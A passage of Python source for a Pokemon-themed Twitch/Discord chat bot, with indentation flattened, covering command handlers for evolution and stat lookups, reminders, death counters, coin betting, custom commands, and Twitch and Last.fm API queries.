for evo_chain in this_chain.get('evolves_to'):
if len(evo_chain.get('evolution_details')) == 1:
output += name.capitalize() + " evolves into " + evo_chain.get('species').get('name').capitalize() + " "
details = evo_chain.get('evolution_details')[0]
if details.get('min_level'):
output += "at level " + str(details.get('min_level'))
if details.get('gender'):
output += ", if female."
elif details.get('relative_physical_stats') is not None:
value = details.get('relative_physical_stats')
if 0 == value:
output += ", if Attack = Defense."
elif 1 == value:
output += ", if Attack > Defense."
elif -1 == value:
output += ", if Attack < Defense."
elif details.get('needs_overworld_rain'):
output += ", if it's raining."
elif details.get('turn_upside_down'):
output += ", if the 3DS is held upside down."
else:
output += "."
elif details.get('min_beauty'):
output += "with beauty level " + str(details.get('min_beauty') + ".")
elif details.get('min_happiness'):
output += "with happiness level " + str(details.get('min_happiness'))
if details.get('time_of_day'):
output += " when it is " + details.get('time_of_day') + "-time."
else:
output += "."
elif details.get('time_of_day'):
output += "when it is " + details.get('time_of_day') + "-time."
elif details.get('item') and details.get('trigger'):
item = details.get('item').get('name').replace('-', ' ').title()
trigger = details.get('trigger').get('name')
if "use-item" == trigger: output += "when a " + item + " is used on it."
elif details.get('known_move_type') and details.get('min_affection'):
move_type = details.get('known_move_type').get('name').capitalize()
affection = details.get('min_affection')
output += "with affection level " + str(affection) + " and knowing a " + move_type + " type move."
elif details.get('known_move'):
output += "upon level-up when it knows " + details.get('known_move').get('name').replace('-', ' ').title()
elif details.get('trigger'):
if "trade" == details.get('trigger').get('name'):
output += "when traded"
if details.get('held_item'):
output += " and holding a " + details.get('held_item').get('name').replace('-', ' ').title() + "."
else:
output += "."
elif "shed" == details.get('trigger').get('name'):
output += "if an extra party slot is open and an extra PokeBall is available."
else:
for det in evo_chain.get('evolution_details'):
if det.get('location'):
loc_id = det.get('location').get('url').split('/')[-2]
try:
loc = drfujibot_pykemon.api.get(location=loc_id)
if loc.region == getRegionForGame(self.get_game(source_user)):
output += name.capitalize() + " evolves into " + evo_chain.get('species').get('name').capitalize() + " "
output += "at " + loc.name.replace('-', ' ').title()
if det.get('trigger'):
if "level-up" == det.get('trigger').get('name'):
output += " by level up."
except:
print("Unexpected error: " + str(sys.exc_info()[0]))
output += " "
self.output_msg(c, output, source_user)
except drfujibot_pykemon.exceptions.ResourceNotFoundError:
#output = "Pokemon '" + name + "' not found."
#suggestions = self.pokemon_corrector.suggest(name.capitalize(), limit=3)
#if len(suggestions) > 0:
# output += " Did you mean: "
# output += ", ".join(suggestions)
#self.output_msg(c, output, source_user)
suggestions = self.pokemon_corrector.suggest(name.capitalize(), limit=1)
if len(suggestions) > 0:
self.processCommand("!evol " + suggestions[0], c, source_user)
else:
self.output_msg(c, "Pokemon '" + name + "' not found", source_user)
except:
print("Unexpected error: " + str(sys.exc_info()[0]))
elif line.startswith("!char"):
if len(line.split(" ")) >= 2:
phrase = line.split(" ", 1)[1].rstrip("\n").rstrip("\r").lower()
try:
# Can't query by name, just grab all 30 and loop through them.
characteristics = []
for i in range(30):
ch = drfujibot_pykemon.api.get(characteristic=(i+1))
characteristics.append(ch)
output = ""
for ch in characteristics:
if phrase.lower() == ch.description:
output += phrase.capitalize() + ": Highest IV is "
iv = ch.highest_stat.replace('-', ' ').title()
if iv == "Hp":
iv = "HP"
output += iv + ". Possible values are: "
str_values = []
for v in ch.possible_values:
str_values.append(str(v))
values = ", ".join(str_values)
output += values
break
if len(output) == 0:
output = "Characteristic '" + phrase + "' not found."
self.output_msg(c, output, source_user)
except drfujibot_pykemon.exceptions.ResourceNotFoundError:
self.output_msg(c, "Characteristic not found.", source_user)
except:
print("Unexpected error: " + str(sys.exc_info()[0]))
elif line.startswith("!ev "):
name = line.split(" ")[1].rstrip("\n").rstrip("\r").lower()
name = fix_pokemon_name(name)
try:
p = drfujibot_pykemon.api.get(pokemon=name,url=self.config['pokeapi_url'])
output = name.capitalize() + " EV Yield: "
evs = []
for stat in p.stats:
if stat.get('effort') > 0:
evs.append(stat.get('stat').get('name').replace('-', ' ').title() + "(" + str(stat.get('effort')) + ")")
output += " ".join(evs)
self.output_msg(c, output, source_user)
except drfujibot_pykemon.exceptions.ResourceNotFoundError:
#output = "Pokemon '" + name + "' not found."
#suggestions = self.pokemon_corrector.suggest(name.capitalize(), limit=3)
#if len(suggestions) > 0:
# output += " Did you mean: "
# output += ", ".join(suggestions)
#self.output_msg(c, output, source_user)
suggestions = self.pokemon_corrector.suggest(name.capitalize(), limit=1)
if len(suggestions) > 0:
self.processCommand("!ev " + suggestions[0], c, source_user)
else:
self.output_msg(c, "Pokemon '" + name + "' not found", source_user)
except:
print("Unexpected error: " + str(sys.exc_info()[0]))
elif line.startswith("!grassknot") or line.startswith("!lowkick"):
name = line.split(" ")[1].rstrip("\n").rstrip("\r").lower()
name = fix_pokemon_name(name)
try:
p = drfujibot_pykemon.api.get(pokemon=name,url=self.config['pokeapi_url'])
output = "Low Kick/Grass Knot has "
if p.weight < 100:
bp = "20"
elif p.weight < 250:
bp = "40"
elif p.weight < 500:
bp = "60"
elif p.weight < 1000:
bp = "80"
elif p.weight < 2000:
bp = "100"
else:
bp = "120"
output += bp
output += " base power against " + name.capitalize() + " ("
output += str(float(p.weight) / 10)
output += " kg)"
self.output_msg(c, output, source_user)
except drfujibot_pykemon.exceptions.ResourceNotFoundError:
#output = "Pokemon '" + name + "' not found."
#suggestions = self.pokemon_corrector.suggest(name.capitalize(), limit=3)
#if len(suggestions) > 0:
# output += " Did you mean: "
# output += ", ".join(suggestions)
#self.output_msg(c, output, source_user)
suggestions = self.pokemon_corrector.suggest(name.capitalize(), limit=1)
if len(suggestions) > 0:
self.processCommand("!grassknot " + suggestions[0], c, source_user)
else:
self.output_msg(c, "Pokemon '" + name + "' not found", source_user)
except:
print("Unexpected error: " + str(sys.exc_info()[0]))
elif line.startswith("!heatcrash") or line.startswith("!heavyslam"):
name = line.split(" ")[1].rstrip("\n").rstrip("\r").lower()
name = fix_pokemon_name(name)
name2 = line.split(" ")[2].rstrip("\n").rstrip("\r").lower()
name2 = fix_pokemon_name(name2)
try:
p1 = drfujibot_pykemon.api.get(pokemon=name,url=self.config['pokeapi_url'])
p2 = drfujibot_pykemon.api.get(pokemon=name2, url=self.config['pokeapi_url'])
output = "Heavy Slam/Heat Crash used by "
bp = "40"
if p1.weight > p2.weight:
relative = p2.weight / p1.weight
if relative > .5:
bp = "40"
elif relative > .3334:
bp = "60"
elif relative > .25:
bp = "80"
elif relative > .2:
bp = "100"
else:
bp = "120"
output += name.capitalize() + " has " + bp + " base power against " + name2.capitalize()
self.output_msg(c, output, source_user)
except drfujibot_pykemon.exceptions.ResourceNotFoundError:
#output = "Pokemon '" + name + "' not found."
#suggestions = self.pokemon_corrector.suggest(name.capitalize(), limit=3)
#if len(suggestions) > 0:
# output += " Did you mean: "
# output += ", ".join(suggestions)
#self.output_msg(c, output, source_user)
suggestions = self.pokemon_corrector.suggest(name.capitalize(), limit=1)
if len(suggestions) > 0:
self.processCommand("!heatcrash " + suggestions[0], c, source_user)
else:
self.output_msg(c, "Pokemon '" + name + "' not found", source_user)
except:
print("Unexpected error: " + str(sys.exc_info()[0]))
elif line.startswith("!gender"):
name = line.split(" ")[1].rstrip("\n").rstrip("\r").lower()
name = fix_pokemon_name(name)
try:
p = drfujibot_pykemon.api.get(species=name,url=self.config['pokeapi_url'])
output = name.capitalize() + ": "
if -1 == p.gender_rate:
output += "Genderless"
else:
percent_female = ( float(p.gender_rate) / float(8) ) * 100
percent_male = 100 - percent_female
output += "Male(" + str(percent_male) + "%) Female(" + str(percent_female) + "%)"
self.output_msg(c, output, source_user)
except drfujibot_pykemon.exceptions.ResourceNotFoundError:
#output = "Pokemon '" + name + "' not found."
#suggestions = self.pokemon_corrector.suggest(name.capitalize(), limit=3)
#if len(suggestions) > 0:
# output += " Did you mean: "
# output += ", ".join(suggestions)
#self.output_msg(c, output, source_user)
suggestions = self.pokemon_corrector.suggest(name.capitalize(), limit=1)
if len(suggestions) > 0:
self.processCommand("!gender " + suggestions[0], c, source_user)
else:
self.output_msg(c, "Pokemon '" + name + "' not found", source_user)
except:
print("Unexpected error: " + str(sys.exc_info()[0]))
elif line.startswith("!faster"):
if len(line.split(" ")) > 2:
pokemon1 = line.split(" ")[1].rstrip("\n").rstrip("\r").lower()
pokemon2 = line.split(" ")[2].rstrip("\n").rstrip("\r").lower()
pokemon1 = fix_pokemon_name(pokemon1)
pokemon2 = fix_pokemon_name(pokemon2)
try:
p1 = drfujibot_pykemon.api.get(pokemon=pokemon1,url=self.config['pokeapi_url'])
try:
p2 = drfujibot_pykemon.api.get(pokemon=pokemon2,url=self.config['pokeapi_url'])
if p1.speed > p2.speed:
output = pokemon1.capitalize() + " (" + str(p1.speed) + ") is faster than " + pokemon2.capitalize() + " (" + str(p2.speed) + ")"
elif p1.speed < p2.speed:
output = pokemon1.capitalize() + " (" + str(p1.speed) + ") is slower than " + pokemon2.capitalize() + " (" + str(p2.speed) + ")"
elif p1.speed == p2.speed:
output = pokemon1.capitalize() + " and " + pokemon2.capitalize() + " are tied for speed (" + str(p1.speed) + ")"
self.output_msg(c, output, source_user)
except drfujibot_pykemon.exceptions.ResourceNotFoundError:
#output = "Pokemon '" + pokemon2 + "' not found."
#suggestions = self.pokemon_corrector.suggest(pokemon2.capitalize(), limit=3)
#if len(suggestions) > 0:
# output += " Did you mean: "
# output += ", ".join(suggestions)
#self.output_msg(c, output, source_user)
suggestions = self.pokemon_corrector.suggest(pokemon2.capitalize(), limit=1)
if len(suggestions) > 0:
self.processCommand("!faster " + pokemon1 + " " + suggestions[0], c, source_user)
else:
self.output_msg(c, "Pokemon '" + pokemon2 + "' not found", source_user)
except:
print("Unexpected error: " + str(sys.exc_info()[0]))
except drfujibot_pykemon.exceptions.ResourceNotFoundError:
#output = "Pokemon '" + pokemon1 + "' not found."
#suggestions = self.pokemon_corrector.suggest(pokemon1.capitalize(), limit=3)
#if len(suggestions) > 0:
# output += " Did you mean: "
# output += ", ".join(suggestions)
#self.output_msg(c, output, source_user)
suggestions = self.pokemon_corrector.suggest(pokemon1.capitalize(), limit=1)
if len(suggestions) > 0:
self.processCommand("!faster " + suggestions[0] + " " + pokemon2, c, source_user)
else:
self.output_msg(c, "Pokemon '" + pokemon1 + "' not found", source_user)
except:
print("Unexpected error: " + str(sys.exc_info()[0]))
else:
self.output_msg(c, "Please input more than one pokemon.", source_user)
elif line.startswith("!exp"):
name = line.split(" ")[1].rstrip("\n").rstrip("\r").lower()
name = fix_pokemon_name(name)
try:
p = drfujibot_pykemon.api.get(pokemon=name,url=self.config['pokeapi_url'])
output = name.capitalize() + ": " + str(p.base_experience) + " Base Exp."
self.output_msg(c, output, source_user)
except drfujibot_pykemon.exceptions.ResourceNotFoundError:
#output = "Pokemon '" + name + "' not found."
#suggestions = self.pokemon_corrector.suggest(name.capitalize(), limit=3)
#if len(suggestions) > 0:
# output += " Did you mean: "
# output += ", ".join(suggestions)
#self.output_msg(c, output, source_user)
suggestions = self.pokemon_corrector.suggest(name.capitalize(), limit=1)
if len(suggestions) > 0:
self.processCommand("!exp " + suggestions[0], c, source_user)
else:
self.output_msg(c, "Pokemon '" + name + "' not found", source_user)
except:
print("Unexpected error: " + str(sys.exc_info()[0]))
elif line.startswith("!remind"):
if len(line.split(" ")) > 2:
timestring = line.split(" ")[1].rstrip("\n").rstrip("\r").lower()
message = line.split(" ", 2)[2].rstrip("\n").rstrip("\r")
delta = parse_time(timestring)
if delta:
self.output_msg(c, "I will remind you in " + timestring + " to " + message, source_user)
reminder = ""
if self.bot_type and self.bot_type == "discord":
if source_id:
# Discord main channel mode
reminder = "Reminder <@!" + source_id + "> : " + message
else:
# Discord whisper mode
reminder = "Reminder: " + message
else:
# Twitch mode
reminder = "Reminder @" + source_user + " : " + message
t = threading.Timer(delta.total_seconds(), self.output_msg, [c, reminder, source_user])
t.start()
else:
self.output_msg(c, "Invalid time string. Examples: 5m 5m30s 1h5m30s", source_user)
else:
self.output_msg(c, "Format: !remind <time> <message>", source_user)
elif line.startswith("!deaths"):
deaths = self.get_current_run_data('deaths')
if None == deaths:
deaths = str(self.deaths)
else:
deaths = str(deaths)
sorted_fallen = sorted(self.fallen_timestamps.items(), key=operator.itemgetter(1), reverse=True)
recent_deaths = []
for i in range(min(3, len(sorted_fallen))):
recent_deaths.append(sorted_fallen[i][0])
self.output_msg(c, "There have been " + deaths + " deaths so far. Most recent deaths (latest first): " + ", ".join(recent_deaths), source_user)
elif line.startswith("!setdeaths"):
if len(line.split(" ")) == 2:
try:
deaths = int(line.split(" ")[1].rstrip("\n").rstrip("\r"))
self.deaths = deaths
self.config['deaths'] = deaths
if None != self.config['current_run'] and None != self.config['run_data']:
if None != self.config['run_data'].get(self.config['current_run']):
self.config['run_data'][self.config['current_run']]['deaths'] = deaths
self.update_config()
self.output_msg(c, "Set death counter to " + str(self.deaths), source_user)
except:
self.output_msg(c, "Format: !setdeaths <number>", source_user)
else:
self.output_msg(c, "Format: !setdeaths <number>", source_user)
elif line.startswith("!rip") and not line.startswith("!riprun"):
if len(line.split(" ")) > 1:
pokemon = line.split(" ", 1)[1]
else:
pokemon = ""
if self.meme_mode:
if None == self.current_deaths.get(pokemon):
self.deaths += 1
self.config['deaths'] = self.deaths
if None != self.config['current_run'] and None != self.config['run_data']:
if None != self.config['run_data'].get(self.config['current_run']):
self.config['run_data'][self.config['current_run']]['deaths'] = self.deaths
self.update_config()
output = "Death counter: " + str(self.deaths) + " riPepperonis "
output += "Press F to pay respects to '" + pokemon + "'"
self.output_msg(c, output, source_user)
self.current_deaths[pokemon] = time.time()
self.deaths_dict[pokemon] = []
else:
self.deaths += 1
output = "Death counter: " + str(self.deaths) + " riPepperonis "
self.output_msg(c, output, source_user)
self.config['deaths'] = self.deaths
if None != self.config['current_run'] and None != self.config['run_data']:
if None != self.config['run_data'].get(self.config['current_run']):
self.config['run_data'][self.config['current_run']]['deaths'] = self.deaths
self.update_config()
elif line.startswith("!ez"):
if self.meme_mode:
self.ez = True
self.ez_count = 0
self.ez_start = time.time()
output = "Type EZ to pay respects to PC"
self.output_msg(c, output, source_user)
elif line.startswith("!fallen"):
sorted_pairs = sorted(self.fallen.items(), key=operator.itemgetter(1), reverse=True)
output = "The most respected fallen: "
if len(sorted_pairs) >= 1:
output += sorted_pairs[0][0]
output += " (" + str(sorted_pairs[0][1]) + ")"
if len(sorted_pairs) >= 2:
output += ", "
output += sorted_pairs[1][0]
output += " (" + str(sorted_pairs[1][1]) + ")"
if len(sorted_pairs) >= 3:
output += ", "
output += sorted_pairs[2][0]
output += " (" + str(sorted_pairs[2][1]) + ")"
self.output_msg(c, output, source_user)
elif line.startswith("!adduser"):
if len(line.split(" ")) == 2:
new_user = line.split(" ")[1].rstrip("\n").rstrip("\r")
self.permitted_users.append(new_user.lower())
save_users = self.permitted_users[:]
if self.username.lower() in save_users:
save_users.remove(self.username.lower())
self.config['permitted_users'] = save_users
self.update_config()
self.output_msg(c, "Added user '" + new_user + "' to permitted users.", source_user)
else:
self.output_msg(c, "Format: !adduser <username>", source_user)
elif line.startswith("!removeuser"):
if len(line.split(" ")) == 2:
remove_user = line.split(" ")[1].rstrip("\n").rstrip("\r")
if remove_user.lower() in self.permitted_users:
self.permitted_users.remove(remove_user.lower())
save_users = self.permitted_users[:]
if self.username.lower() in save_users:
save_users.remove(self.username.lower())
self.config['permitted_users'] = save_users
self.update_config()
self.output_msg(c, "Removed user '" + remove_user + "' from permitted users.", source_user)
else:
self.output_msg(c, "User '" + remove_user + "' not found.", source_user)
else:
self.output_msg(c, "Format: !removeuser <username>", source_user)
elif line.startswith("!addshoutout"):
if len(line.split(" ")) == 2:
new_user = line.split(" ")[1].rstrip("\n").rstrip("\r")
if new_user not in self.config['auto_shoutout']:
self.config['auto_shoutout'].append(new_user.lower())
self.update_config()
self.output_msg(c, "Added user '" + new_user + "' to auto-shoutout.", source_user)
else:
self.output_msg(c, "Format: !addshoutout <username>", source_user)
elif line.startswith("!removeshoutout"):
if len(line.split(" ")) == 2:
remove_user = line.split(" ")[1].rstrip("\n").rstrip("\r")
if remove_user.lower() in self.config['auto_shoutout']:
self.config['auto_shoutout'].remove(remove_user.lower())
self.update_config()
self.output_msg(c, "Removed user '" + remove_user + "' from auto-shoutout.", source_user)
else:
self.output_msg(c, "User '" + remove_user + "' not found.", source_user)
else:
self.output_msg(c, "Format: !removeshoutout <username>", source_user)
elif line.startswith("!whatis"):
name = line.split(" ", 1)[1].rstrip("\n").rstrip("\r").lower()
name = name.replace(" ", "-")
try:
m = drfujibot_pykemon.api.get(move=name,url=self.config['pokeapi_url'])
self.processCommand("!move " + name, c, source_user, prefix="Move: ")
except drfujibot_pykemon.exceptions.ResourceNotFoundError:
try:
a = drfujibot_pykemon.api.get(ability=name,url=self.config['pokeapi_url'])
self.processCommand("!ability " + name, c, source_user, prefix="Ability: ")
except drfujibot_pykemon.exceptions.ResourceNotFoundError:
self.output_msg(c, "Could not find '" + name + "'", source_user)
elif line.startswith("!anagram"):
word = line.split(" ", 1)[1].rstrip("\n").rstrip("\r").lower()
if len(word) <= 10:
a = Anagram(word)
anagram_list = a.get_anagrams()
random.shuffle(anagram_list)
output = "Anagrams: "
if len(anagram_list) > 1:
output += ", ".join(anagram_list)
else:
output += "(none)"
if len(output) > 240:
output = output[:240]
output = output.rsplit(", ", 1 )[0]
else:
output = "Word too long, max 10 characters"
self.output_msg(c, output, source_user)
elif line.startswith("!event"):
self.new_bet(c, line, source_user)
elif line.startswith("!close"):
if self.foundCoinFile:
if len(line.split(" ")) == 2:
event_name = line.split(" ")[1].rstrip("\n").rstrip("\r").lower()
if event_name in self.open_events.keys():
self.closed_events[event_name] = self.open_events[event_name]
del self.open_events[event_name]
self.output_msg(c, "Betting has closed for '" + event_name + "' event!", source_user)
self.config['open_events'] = self.open_events
self.config['closed_events'] = self.closed_events
if None != self.config['current_run'] and None != self.config['run_data']:
if None != self.config['run_data'].get(self.config['current_run']):
self.config['run_data'][self.config['current_run']]['closed_events'] = copy.deepcopy(self.closed_events)
self.update_config()
else:
self.output_msg(c, "Event '" + event_name + "' not found", source_user)
else:
self.output_msg(c, "Event name must not contain spaces", source_user)
else:
self.output_msg(c, "Betting has not been configured", source_user)
elif line.startswith("!cancel"):
if self.foundCoinFile:
if len(line.split(" ")) == 2:
event_name = line.split(" ")[1].rstrip("\n").rstrip("\r").lower()
if event_name in self.open_events.keys():
wager = self.open_event_rewards[event_name]
for user in self.open_events[event_name].keys():
self.coin_data['coins'][user] += wager
self.update_coin_data()
del self.open_events[event_name]
del self.open_event_rewards[event_name]
self.output_msg(c, "Event '" + event_name + "' has been cancelled, and all bets refunded", source_user)
self.config['open_events'] = self.open_events
self.config['open_event_rewards'] = self.open_event_rewards
self.update_config()
elif event_name in self.closed_events.keys():
for user in self.closed_events[event_name].keys():
wager = self.open_event_rewards[event_name]
self.coin_data['coins'][user] += wager
self.update_coin_data()
del self.closed_events[event_name]
del self.open_event_rewards[event_name]
self.output_msg(c, "Event '" + event_name + "' has been cancelled, and all bets refunded", source_user)
self.config['closed_events'] = self.closed_events
self.config['open_event_rewards'] = self.open_event_rewards
self.update_config()
else:
self.output_msg(c, "Event '" + event_name + "' not found", source_user)
else:
self.output_msg(c, "Event name must not contain spaces", source_user)
else:
self.output_msg(c, "Betting has not been configured", source_user)
elif line.startswith("!resolve"):
self.resolve_bet(c, line, source_user)
elif line.startswith("!bet"):
if len(line.split(" ")) == 2:
guess = line.split(" ")[1].rstrip("\n").rstrip("\r").lower()
try:
if len(self.open_events.keys()) == 1:
event_name = list(self.open_events.keys())[0]
coins = self.open_event_rewards[event_name]
if guess in self.bet_config['events'][event_name]['outcomes'].keys():
with self.coin_lock:
if None == self.coin_data['coins'].get(source_user):
# If it's a new user and the coin loop hasn't run yet
self.coin_data['coins'][source_user] = 0
refund = 0
previous = self.open_events[event_name].get(source_user)
if None != previous:
refund = previous[1]
self.open_events[event_name][source_user] = (guess, coins)
self.config['open_events'] = self.open_events
self.update_config()
else:
self.output_msg(c, "@" + source_user + " Not a valid outcome!", source_user)
else:
self.output_msg(c, "Could not find active event", source_user)
except:
self.output_msg(c, "Format: !bet <guess>", source_user)
else:
self.output_msg(c, "Format: !bet <guess>", source_user)
elif line.startswith("!daily"):
if not self.whisperMode and self.username != 'everoddish':
now = datetime.datetime.now()
if self.coin_data['last_daily_bonus'].get(source_user):
last = datetime.datetime.fromtimestamp(self.coin_data['last_daily_bonus'][source_user])
else:
last = now - datetime.timedelta(hours=25)
if last < self.start_time:
last = now - datetime.timedelta(hours=25)
output = ""
diff = now - last
if diff.days >= 1:
more_coins = random.randint(0, 100)
crit = random.randint(1, 16)
if 1 == crit and 0 != more_coins:
more_coins *= 2
output = "@" + source_user + " You received a daily bonus of " + str(more_coins) + " coins!"
if 1 == crit and 0 != more_coins:
output += " A critical hit!"
if 0 == more_coins:
output += " It missed!"
timestamp = time.mktime(now.timetuple())
self.coin_data['last_daily_bonus'][source_user] = timestamp
self.update_config()
with self.coin_lock:
if None == self.coin_data['coins'].get(source_user):
# If it's a new user and the coin loop hasn't run yet
self.coin_data['coins'][source_user] = 0
self.coin_data['coins'][source_user] += more_coins
self.update_coin_data()
else:
diff2 = datetime.timedelta(hours=24) - diff
output = "@" + source_user
output += " You can receive another daily bonus in "
output += str(diff2.seconds//3600) + " hours and "
output += str((diff2.seconds//60)%60) + " minutes"
self.output_msg(c, output, source_user)
elif line.startswith("!riprun"):
# Streamer only
if source_user.lower() == self.username.lower():
if self.foundCoinFile:
if len(line.split(" ")) >= 3:
# Set deaths to zero
self.deaths = 0
self.config['deaths'] = 0
if None != self.config['current_run'] and None != self.config['run_data']:
if None != self.config['run_data'].get(self.config['current_run']):
self.config['run_data'][self.config['current_run']]['deaths'] = self.deaths
self.update_config()
try:
num_badges = int(line.split(" ")[1].rstrip("\n").rstrip("\r").lower())
message = line.split(" ", 2)[2].rstrip("\n").rstrip("\r")
# Resolve badge bets
command = "!resolve badges " + str(num_badges)
self.resolve_bet(c, command, source_user)
# Start a new badge bet
command = "!event badges 10000"
self.new_bet(c, command, source_user)
if None != self.config['current_run'] and None != self.config['run_data']:
if None != self.config['run_data'].get(self.config['current_run']):
self.config['run_data'][self.config['current_run']]['!lastrun'] = message
self.config['run_data'][self.config['current_run']]['attempt'] += 1
if None != self.config['extra_commands'].get('!lastrun'):
self.config['extra_commands']['!lastrun'] = message
self.update_config()
self.output_msg(c, "Rip run BibleThump", source_user)
except Exception as e:
print("Exception: " + str(e))
else:
self.output_msg(c, "Format: !riprun <num_badges_obtained> <new_!lastrun_message>", source_user)
else:
self.output_msg(c, "Betting has not been configured", source_user)
elif line.startswith("!notify "):
# Streamer only (or me nathanPepe)
if "pokemonchallenges" == self.username.lower() or "pokemonrealtime" == source_user.lower():
message = line.split(" ", 1)[1].rstrip("\n").rstrip("\r")
timestamp = int(time.time())
self.pcce["notification"] = str(timestamp) + ":" + message
self.update_pcce()
self.output_msg(c, "Notification sent to PCCE users", source_user)
elif line.startswith("!leaderboard"):
if "pokemonchallenges" == self.username.lower():
with open('PokemonChallenges_coins.json', 'r') as coin_file:
coin_info = json.load(coin_file)
coins = coin_info.get('coins')
if None != coins:
sorted_data = sorted(coins.items(), key=operator.itemgetter(1))
i = 0
output = "Leaderboard: "
for e in reversed(sorted_data):
#print(e[0] + " - " + str(e[1]))
output += e[0] + "(" + str(int(e[1])) + ") "
if i >= 2:
break
i += 1
self.output_msg(c, output, source_user)
elif line.startswith("!balance"):
if self.whisperMode:
output = get_coin_balances(source_user)
self.output_msg(c, output, source_user)
else:
self.output_msg(c, 'The !balance command has returned to whisper-only mode! Type "/w DrFujiBot !balance" to see your coins!', source_user)
elif line.startswith("!credit"):
if len(line.split(" ")) >= 3:
arg1 = line.split(" ")[1]
arg2 = line.split(" ")[2]
success = False
try:
coins = int(arg1)
user = arg2
success = True
except:
pass
try:
coins = int(arg2)
user = arg1
success = True
except:
pass
if success:
with self.coin_lock:
if None == self.coin_data['coins'].get(user):
self.coin_data['coins'][user] = coins
else:
self.coin_data['coins'][user] += coins
self.update_coin_data()
output = "Credited " + str(coins) + " coins to @" + user
self.output_msg(c, output, source_user)
else:
self.output_msg(c, "Format: !credit <user> <coins>", source_user)
elif line.startswith("!coins"):
if self.whisperMode:
output1 = "You're earning coins while sitting in chat! Make sure to use the !daily command every 24 hours to get a daily coin reward! "
output2 = "You can check your savings at any time by using the !balance command. "
output3 = "A mod will start a betting event in chat, and you can joing by typing !bet <event> <outcome> <coins> after the event has started! "
output4 = "For example: '!bet nature modest 100' For a full list of betting commands and what they do, click here: https://goo.gl/i8slEk"
output5 = get_coin_balances(source_user)
self.output_msg(c, output1, source_user)
time.sleep(1)
self.output_msg(c, output2, source_user)
time.sleep(1)
self.output_msg(c, output3, source_user)
time.sleep(1)
self.output_msg(c, output4, source_user)
time.sleep(1)
self.output_msg(c, output5, source_user)
else:
output = "You're currently earning coins and can use them to bet on what might happen during the stream! "
output += "Use !balance to see your current savings!"
self.output_msg(c, output, source_user)
elif line.startswith("!addcom"):
if True == self.config['extra_commands_on']:
if len(line.split(" ")) >= 3:
command = line.split(" ")[1].rstrip("\n").rstrip("\r").lower()
message = line.split(" ", 2)[2].rstrip("\n").rstrip("\r")
if command.startswith("!"):
if not message.startswith("!"):
if False == self.is_valid_command(command):
if None == self.config['extra_commands'].get(command):
if self.is_setrun_command(command):
self.set_current_run_data(command, message)
else:
self.config['extra_commands'][command] = message
self.update_config()
self.output_msg(c, command + " command added", source_user)
else:
self.output_msg(c, "Command already exists", source_user)
else:
self.output_msg(c, "Cannot override existing DrFujiBot command", source_user)
else:
self.output_msg(c, "Message cannot start with !", source_user)
else:
self.output_msg(c, "Command must start with !", source_user)
else:
self.output_msg(c, "Format: !addcom <!command> <message>", source_user)
elif line.startswith("!editcom"):
if True == self.config['extra_commands_on']:
if len(line.split(" ")) >= 3:
command = line.split(" ")[1].rstrip("\n").rstrip("\r").lower()
message = line.split(" ", 2)[2].rstrip("\n").rstrip("\r")
if command.startswith("!"):
if not message.startswith("!"):
exists = False
if self.is_setrun_command(command):
exists = True
else:
# Not using !setrun
if None != self.config['extra_commands'].get(command):
exists = True
if exists:
if self.is_setrun_command(command):
self.set_current_run_data(command, message)
else:
self.config['extra_commands'][command] = message
self.update_config()
self.output_msg(c, command + " command updated", source_user)
else:
self.output_msg(c, "Command '" + command + "' not found", source_user)
else:
self.output_msg(c, "Message cannot start with !", source_user)
else:
self.output_msg(c, "Command must start with !", source_user)
else:
self.output_msg(c, "Format: !editcom <!command> <message>", source_user)
elif line.startswith("!delcom"):
if True == self.config['extra_commands_on']:
if len(line.split(" ")) == 2:
command = line.split(" ")[1].rstrip("\n").rstrip("\r").lower()
if None != self.config['extra_commands'].get(command):
del self.config['extra_commands'][command]
self.update_config()
self.output_msg(c, command + " command deleted", source_user)
else:
self.output_msg(c, "Command '" + command + "' not found", source_user)
else:
self.output_msg(c, "Format: !delcom <!command>", source_user)
elif line.startswith("!so ") or line.startswith("!shoutout"):
if True == self.config['extra_commands_on']:
streamer = ""
if len(line.split(" ")) >= 2:
streamer = line.split(" ")[1].rstrip("\n").rstrip("\r")
else:
streamer = self.username
self.do_shoutout(c, streamer, self.config['shoutout_messages'], 0, source_user)
elif line.startswith("!raid"):
# Streamer only
if source_user.lower() == self.username.lower():
if len(line.split(" ")) == 2:
streamer = line.split(" ")[1].rstrip("\n").rstrip("\r")
output = self.config.get('raid_message')
if None != output:
for i in range(5):
self.output_msg(c, output, source_user, 0)
output = "twitch.tv/" + streamer
for i in range(5):
self.output_msg(c, output, source_user, 0)
elif line.startswith("!uptime"):
if True == self.config['extra_commands_on']:
output = ""
CLIENT_ID = get_fuji_config_value('twitch_client_id')
STREAM_INFO_URL = 'https://api.twitch.tv/kraken/streams?channel=' + self.username
try:
request = urllib.request.Request(STREAM_INFO_URL)
request.add_header('Client-ID', CLIENT_ID)
response = urllib.request.urlopen(request)
data = json.loads(response.read().decode('utf-8'))
if len(data['streams']) > 0:
created_at = data['streams'][0]['created_at']
live_datetime = iso8601.parse_date(created_at)
now = datetime.datetime.now(datetime.timezone.utc)
diff = now - live_datetime
output = "Uptime: "
output += str(diff.seconds//3600) + " hours and "
output += str((diff.seconds//60)%60) + " minutes"
else:
output = "This channel is offline"
except:
print("Unexpected error: " + str(sys.exc_info()[0]))
output = "Error getting uptime from Twitch server"
self.output_msg(c, output, source_user)
elif line.startswith("!song"):
lastfm_user = self.config.get('lastfm_user')
LASTFM_API_KEY = get_fuji_config_value('lastfm_api_key')
if None != lastfm_user:
lastfm_url = "http://ws.audioscrobbler.com/2.0/?method=user.getrecenttracks&user="
lastfm_url += lastfm_user
lastfm_url += "&api_key="
lastfm_url += LASTFM_API_KEY
lastfm_url += "&format=json"
try:
response = urllib.request.urlopen(lastfm_url).read().decode('UTF-8')
lastfm_data = json.loads(response)
#for track in lastfm_data['recenttracks']['track']:
# print(track['name'] + " - " + track['artist']['#text'])
most_recent_track = lastfm_data['recenttracks']['track'][0]
output = most_recent_track['name'] + " - " + most_recent_track['artist']['#text']
spotify_user = self.config.get('spotify_user')
if None != spotify_user:
output += " | Check out my playlists here: https://open.spotify.com/user/" + spotify_user
self.output_msg(c, output, source_user)
except Exception as e:
print("!song exception: " + str(e))
elif line.startswith("!quote"):
if True == self.config['extra_commands_on']:
if len(self.config['quotes'].keys()) > 0:
# Cooldown
last_output = self.extra_command_cooldown.get("!quote")
should_output = False
current_time = datetime.datetime.now()
if None == last_output:
should_output = True
else:
diff = current_time - last_output
if diff.seconds >= 10:
should_output = True
if should_output:
key = ""
quote = ""
is_int = False
if len(line.split(" ")) > 1:
